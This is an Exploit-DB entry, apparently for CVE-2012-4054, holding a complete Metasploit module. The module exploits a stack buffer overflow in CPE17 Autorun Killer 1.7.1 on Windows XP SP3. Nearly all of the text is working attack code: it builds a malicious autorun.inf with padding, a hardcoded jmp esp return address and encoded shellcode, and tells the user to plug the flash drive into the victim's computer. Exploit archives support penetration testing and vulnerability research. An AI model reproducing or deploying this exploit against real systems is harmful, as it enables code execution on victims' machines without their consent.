CPE17 Autorun Killer 1.7.1 - Local Stack Buffer Overflow (Metasploit)

EDB-ID:

18792

CVE:

2012-4054

EDB Verified:

Author:

Xenithz xpt

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2012-04-27

Vulnerable App: 
#
# CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit
# by Xelenonz

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

      include Msf::Exploit::FILEFORMAT

      def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit',
                        'Description'    => %q{
                                        readfile function is vulnerable it can be overflow  
                                             },
                        'Author'         => [ 'Xelenonz' ],
                        'Version'        => '0.1',
                        
                        'Payload'        =>
                                {
                                        'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
										'EncoderOptions' => {'BufferRegister'=>'ECX'},
                                },
			'DefaultOptions' =>
                				{
                    			'DisablePayloadHandler' => 'true',
                				},
                        'Platform'       => 'windows',

                        'Targets'        =>
                                [
                                        [
                                        	'Windows XP SP3',
                                          		{ 	'Ret' => 0x775a676f, 
                                          			'Offset' => 500 
                                          		} 
                                       ],
                                      
                                ],
                        'DefaultTarget' => 0,

                        'Privileged'     => false
                        ))

                        register_options(
                        [
                        	OptString.new('FILENAME',   [ true, 'The file name.',  'autorun.inf']),
                        ], self.class)
       end

       def exploit
       	  print_status("Encoding Payload ...")
          enc = framework.encoders.create("x86/alpha_mixed")
		  enc.datastore.import_options_from_hash( {'BufferRegister'=>'ESP'} )
		  hunter = enc.encode(payload.encoded, nil, nil, platform)
		  buffer = ""
          buffer << "A"*target['Offset'] # padding offset
          buffer << [target.ret].pack('V') # jmp esp
          buffer << hunter # shellcode
          print_status("Creating '#{datastore['FILENAME']}' file ...")
          file_create(buffer)
          print_status("Plug flashdrive to victim's computer")
          handler
          
       end
end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services